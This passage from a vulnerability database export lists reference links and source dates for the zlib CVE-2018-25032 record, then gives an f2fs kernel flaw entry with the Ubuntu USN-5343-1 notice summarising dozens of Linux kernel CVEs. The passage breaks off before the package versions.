"url": "https://www.auscert.org.au/bulletins/esb-2022.3136"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167400/red-hat-security-advisory-2022-4896-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6128"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3977"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167391/red-hat-security-advisory-2022-4592-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2924"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170003/ubuntu-security-notice-usn-5739-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072056"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167956/red-hat-security-advisory-2022-5840-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060505"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062931"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167622/red-hat-security-advisory-2022-5392-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167088/red-hat-security-advisory-2022-1679-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3020"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167346/red-hat-security-advisory-2022-4863-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022050233"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070507"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051324"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2411"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4632"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166946/red-hat-security-advisory-2022-1681-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167461/red-hat-security-advisory-2022-4985-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167568/red-hat-security-advisory-2022-5152-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3821"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1665"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1863"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3228"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2019"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2778"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167224/red-hat-security-advisory-2022-4692-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168042/red-hat-security-advisory-2022-5069-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167142/red-hat-security-advisory-2022-2216-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2857"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166970/red-hat-security-advisory-2022-1715-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb20220720108"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042114"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167260/red-hat-security-advisory-2022-2283-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167555/red-hat-security-advisory-2022-5132-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167591/red-hat-security-advisory-2022-5188-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022061722"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168392/red-hat-security-advisory-2022-6526-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167486/ubuntu-security-notice-usn-5359-2.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022040603"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2181"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167189/apple-security-advisory-2022-05-16-4.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166563/ubuntu-security-notice-usn-5359-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3236"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3479"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4601"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1677"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1677"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://github.com/ziparchive/ziparchive"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-10"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5392"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21476"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21496"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:2272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:2270"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21496"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21443"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21476"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8420"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7813"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4863"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:2267"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:2268"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167271",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169897",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171159",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169782",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167346",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167265",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"date": "2022-03-25T00:00:00",
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"date": "2022-06-29T20:27:02",
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"date": "2022-05-26T16:32:44",
"db": "PACKETSTORM",
"id": "167271",
"ident": null
},
{
"date": "2022-11-16T16:09:49",
"db": "PACKETSTORM",
"id": "169897",
"ident": null
},
{
"date": "2023-02-28T16:53:38",
"db": "PACKETSTORM",
"id": "171159",
"ident": null
},
{
"date": "2022-11-08T13:50:54",
"db": "PACKETSTORM",
"id": "169782",
"ident": null
},
{
"date": "2022-06-01T17:29:48",
"db": "PACKETSTORM",
"id": "167346",
"ident": null
},
{
"date": "2022-05-26T16:03:57",
"db": "PACKETSTORM",
"id": "167265",
"ident": null
},
{
"date": "2022-07-01T15:04:32",
"db": "PACKETSTORM",
"id": "167679",
"ident": null
},
{
"date": "2022-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"date": "2022-03-25T09:15:08.187000",
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-11T00:00:00",
"db": "VULHUB",
"id": "VHN-418557",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-25032",
"ident": null
},
{
"date": "2023-06-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"ident": null
},
{
"date": "2025-08-21T20:37:11.840000",
"db": "NVD",
"id": "CVE-2018-25032",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "zlib Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
],
"trust": 0.6
}
}
VAR-202104-1670
Vulnerability from variot - Updated: 2026-03-09 20:30An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. Linux Kernel Exists in an out-of-bounds read vulnerability.Information is obtained and service operation is interrupted (DoS) It may be in a state. The vulnerability stems from a boundary check failure. ========================================================================== Ubuntu Security Notice USN-5343-1 March 22, 2022
linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-kvm: Linux kernel for cloud environments - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty
Details:
Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)
It was discovered that the aufs file system in the Linux kernel did not properly restrict mount namespaces, when mounted with the non-default allow_userns option set. A local attacker could use this to gain administrative privileges. (CVE-2016-2853)
It was discovered that the aufs file system in the Linux kernel did not properly maintain POSIX ACL xattr data, when mounted with the non-default allow_userns option. A local attacker could possibly use this to gain elevated privileges. (CVE-2016-2854)
It was discovered that the f2fs file system in the Linux kernel did not properly validate metadata in some situations. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-19449)
It was discovered that the XFS file system implementation in the Linux kernel did not properly validate meta data in some circumstances. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service. (CVE-2020-12655)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)
Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly handle error conditions in some situations, leading to an infinite loop. A local attacker could use this to cause a denial of service. (CVE-2020-25673)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)
Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)
It was discovered that the BR/EDR pin-code pairing procedure in the Linux kernel was vulnerable to an impersonation attack. A physically proximate attacker could possibly use this to pair to a device without knowledge of the pin-code. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)
It was discovered that the FUSE user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2020-36322)
It was discovered that the Infiniband RDMA userspace connection manager implementation in the Linux kernel contained a race condition leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possible execute arbitrary code. (CVE-2020-36385)
It was discovered that the DRM subsystem in the Linux kernel contained double-free vulnerabilities. A privileged attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-20292)
It was discovered that a race condition existed in the timer implementation in the Linux kernel. A privileged attacker could use this to cause a denial of service. (CVE-2021-20317)
Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)
It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)
It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)
It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)
It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)
It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033)
It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
Asaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the Linux kernel did not properly validate large MTU requests from Virtual Function (VF) devices. A local attacker could possibly use this to cause a denial of service. (CVE-2021-33098)
Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. (CVE-2021-34693)
马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device detach events, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3573)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)
It was discovered that the Virtio console implementation in the Linux kernel did not properly validate input lengths in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-38160)
It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly compute the access permissions for shadow pages in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-38198)
It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)
It was discovered that the NFC implementation in the Linux kernel did not properly handle failed connect events leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2021-38208)
It was discovered that the configfs interface for USB gadgets in the Linux kernel contained a race condition. (CVE-2021-39648)
It was discovered that the ext4 file system in the Linux kernel contained a race condition when writing xattrs to an inode. A local attacker could use this to cause a denial of service or possibly gain administrative privileges. (CVE-2021-40490)
It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)
It was discovered that the ISDN CAPI implementation in the Linux kernel contained a race condition in certain situations that could trigger an array out-of-bounds bug. A privileged local attacker could possibly use this to cause a denial of service or execute arbitrary code. (CVE-2021-43389)
It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)
Wenqing Liu discovered that the f2fs file system in the Linux kernel did not properly validate the last xattr entry in an inode. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-45469)
Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)
It was discovered that the per cpu memory allocator in the Linux kernel could report kernel pointers via dmesg. An attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. (CVE-2018-5995)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
